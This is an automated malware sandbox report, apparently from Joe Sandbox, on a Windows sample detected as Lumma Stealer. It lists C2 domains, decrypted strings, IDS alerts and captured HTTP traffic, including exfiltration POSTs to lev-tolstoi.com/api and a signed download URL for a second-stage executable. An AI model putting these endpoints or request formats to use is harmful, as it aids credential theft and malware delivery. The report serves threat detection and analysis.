DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.66.86	lev-tolstoi.com	United States	13335	CLOUDFLARENETUS	false
23.55.153.106	steamcommunity.com	United States	20940	AKAMAI-ASN1EU	false
185.166.143.49	bitbucket.org	Germany	16509	AMAZON-02US	false
52.216.152.124	s3-w.us-east-1.amazonaws.com	United States	16509	AMAZON-02US	false

Contacted Domains

Name	IP	Active
s3-w.us-east-1.amazonaws.com	52.216.152.124	true
bitbucket.org	185.166.143.49	true
steamcommunity.com	23.55.153.106	true
lev-tolstoi.com	104.21.66.86	true
bbuseruploads.s3.amazonaws.com	unknown	unknown
sweepyribs.lat	unknown	unknown
necklacebudi.lat	unknown	unknown
sustainskelet.lat	unknown	unknown
crosshuaht.lat	unknown	unknown
rapeflowwj.lat	unknown	unknown
grannyejh.lat	unknown	unknown
aspecteirs.lat	unknown	unknown
discokeyus.lat	unknown	unknown
energyaffai.lat	unknown	unknown

Contacted URLs

Name	Malicious	Reputation
aspecteirs.lat	false	high
sweepyribs.lat	false	high
sustainskelet.lat	false	high
rapeflowwj.lat	false	high
https://steamcommunity.com/profiles/76561199724331900	false	high
energyaffai.lat	false	high
https://lev-tolstoi.com/api	false	high
grannyejh.lat	false	high
necklacebudi.lat	false	high

AV Detection

Antivirus / Scanner detection for submitted sample

Source: jSFUzuYPG9.exe

Avira: detected

Found malware configuration

Source: jSFUzuYPG9.exe.7428.0.memstrmin

Multi AV Scanner detection for submitted file

Source: jSFUzuYPG9.exe	ReversingLabs: Detection: 63%
Source: jSFUzuYPG9.exe	Virustotal: Detection: 50%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: jSFUzuYPG9.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rapeflowwj.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: crosshuaht.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: sustainskelet.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: aspecteirs.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: energyaffai.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: necklacebudi.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: discokeyus.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: grannyejh.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: sweepyribs.lat
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: LOGS11--LiveTraffic

Uses 32bit PE files

Source: jSFUzuYPG9.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.11:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.11:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.216.152.124:443 -> 192.168.2.11:49777 version: TLS 1.2

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

Directory queried: number of queries: 1001

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.11:63590 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.11:60253 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.11:65433 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.11:51180 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.11:60277 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.11:58057 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.11:55218 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.11:50665 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.11:54667 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.11:49709 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.11:49721 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49767 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:49715 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49715 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49721 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:49733 -> 104.21.66.86:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: energyaffai.lat
Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	URLs: aspecteirs.lat
Source: Malware configuration extractor	URLs: crosshuaht.lat
Source: Malware configuration extractor	URLs: sweepyribs.lat
Source: Malware configuration extractor	URLs: sustainskelet.lat
Source: Malware configuration extractor	URLs: grannyejh.lat
Source: Malware configuration extractor	URLs: necklacebudi.lat

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 104.21.66.86 104.21.66.86
Source: Joe Sandbox View	IP Address: 23.55.153.106 23.55.153.106
Source: Joe Sandbox View	IP Address: 185.166.143.49 185.166.143.49

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49715 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49733 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49709 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49721 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49748 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49772 -> 185.166.143.49:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49727 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49739 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49755 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49767 -> 104.21.66.86:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49777 -> 52.216.152.124:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HHOEN70NKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12799Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G0ZRODU1MVEYOKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15041Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VSKU0NU9BAG1J2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20410Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FFVY7DHX236User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1209Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2LZ5UATFIAIX09User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 588109Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIZ7XL2U7&Signature=FCPVgbdRXx%2FDjhvQvPzU1dQ3dNE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQDOJENS5X8jDlzsJxuPb2pH5MjLxA952GUpuJ9K8c8eAgIgeBp5O3n2dCArHo7VZBQEhKa5Ybqf7xD1F%2BZzGAepczwqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDIf5Q5o38rOF7VorZiqEApSlSAviV7fqKWYqWG4d0%2BlfrC%2FFb7F%2Fc2GVH68DYRo2vd%2BAREXXJpsY5s%2BmBpFXzm6fy26oRa5GS8wZd9Nc0FYJUoSZjhvzo%2FM%2FM6PUw%2FINg1gRCi7PRFdMEoNyTOkNSC2S8%2FTK1pGG4o8hZEeM8vyBsvr0QE%2FuOcUu5JrCscWEP%2BFIPyeSmLpATVuvDiwsooP38cS3cC5Mhjir0zJP2xZUtK%2BDRPz%2BgACYHXpemn2WCxpgImxr6YWsOyoQOhLS0ii2eBVVjZpJNT1ozD%2FkBPjRAjUAEFa5C8b6hC%2FuETQ%2BEKayEkNgfTaLoNER0YYk%2BLdQYmqD3E5OEWQc3mClPsl8QceiMMSmpLsGOp0BepAG7qOdA1hoVp77QSvDNIy85cM9X4QKinihkh90Gdln%2FwS%2BMi4ynXs5fFObnXard%2B5fkTffWOZz4AAnQ1g4%2FaEEJTRdstxSXhoxukE9KAy%2Fq7WmNCu9sA6P5tOZSc7t6W8LRba2NCA3DkwySsQ7mbpcH%2Fh%2BHvf17xRCK7I%2BtWG4OCa%2FkKK4HempfXWhoX%2BEE2qBiW2nLYzf0Zo0QQ%3D%3D&Expires=1734941260 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIZ7XL2U7&Signature=FCPVgbdRXx%2FDjhvQvPzU1dQ3dNE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQDOJENS5X8jDlzsJxuPb2pH5MjLxA952GUpuJ9K8c8eAgIgeBp5O3n2dCArHo7VZBQEhKa5Ybqf7xD1F%2BZzGAepczwqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDIf5Q5o38rOF7VorZiqEApSlSAviV7fqKWYqWG4d0%2BlfrC%2FFb7F%2Fc2GVH68DYRo2vd%2BAREXXJpsY5s%2BmBpFXzm6fy26oRa5GS8wZd9Nc0FYJUoSZjhvzo%2FM%2FM6PUw%2FINg1gRCi7PRFdMEoNyTOkNSC2S8%2FTK1pGG4o8hZEeM8vyBsvr0QE%2FuOcUu5JrCscWEP%2BFIPyeSmLpATVuvDiwsooP38cS3cC5Mhjir0zJP2xZUtK%2BDRPz%2BgACYHXpemn2WCxpgImxr6YWsOyoQOhLS0ii2eBVVjZpJNT1ozD%2FkBPjRAjUAEFa5C8b6hC%2FuETQ%2BEKayEkNgfTaLoNER0YYk%2BLdQYmqD3E5OEWQc3mClPsl8QceiMMSmpLsGOp0BepAG7qOdA1hoVp77QSvDNIy85cM9X4QKinihkh90Gdln%2FwS%2BMi4ynXs5fFObnXard%2B5fkTffWOZz4AAnQ1g4%2FaEEJTRdstxSXhoxukE9KAy%2Fq7WmNCu9sA6P5tOZSc7t6W8LRba2NCA3DkwySsQ7mbpcH%2Fh%2BHvf17xRCK7I%2BtWG4OCa%2FkKK4HempfXWhoX%2BEE2qBiW2nLYzf0Zo0QQ%3D%3D&Expires=1734941260 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com

Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: .fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https: equals www.youtube.com (Youtube)
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; con equals www.youtube.com (Youtube)
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; con equals www.youtube.com (Youtube)
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Per equals www.youtube.com (Youtube)
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: p.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https:// equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: sweepyribs.lat
Source: global traffic	DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic	DNS traffic detected: DNS query: discokeyus.lat
Source: global traffic	DNS traffic detected: DNS query: necklacebudi.lat
Source: global traffic	DNS traffic detected: DNS query: energyaffai.lat
Source: global traffic	DNS traffic detected: DNS query: aspecteirs.lat
Source: global traffic	DNS traffic detected: DNS query: sustainskelet.lat
Source: global traffic	DNS traffic detected: DNS query: crosshuaht.lat
Source: global traffic	DNS traffic detected: DNS query: rapeflowwj.lat
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: lev-tolstoi.com
Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com

Source: unknown

Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: jSFUzuYPG9.exe, 00000000.00000002.1979443513.00000000064D9000.00000002.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1649934312.0000000005EA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
